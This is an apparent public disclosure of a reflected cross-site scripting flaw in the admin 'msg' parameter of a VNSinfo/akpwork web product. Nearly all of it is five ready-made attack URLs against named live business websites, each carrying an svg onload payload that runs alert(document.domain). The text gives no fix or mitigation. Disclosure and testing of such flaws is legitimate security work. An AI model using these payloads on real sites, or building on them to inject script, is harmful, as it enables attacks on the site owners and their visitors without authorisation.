Twitter: @SonnySpooks Developers: VNSinfo/akpwork App Version: All Vuln: /admin/index.php?msg=<HERE> Example List \/ Example 1: http://www.insightradiology.com.au/admin/index.php?msg=<svg/onload=alert(document.domain)> Example 2: http://thedukehotel.com.au/admin/?msg=%3Csvg/onload=alert(document.domain)%3E Example 3: http://gremarine.com.au/admin/?msg=%3Csvg/onload=alert(document.domain)%3E Example 4: http://worklocker.com.au/admin/index.php?msg=%3Csvg/onload=alert(document.domain)%3E Example 5: http://www.fxma.com.au/admin/?msg=%3Csvg/onload=alert(document.domain)%3E Examples End /\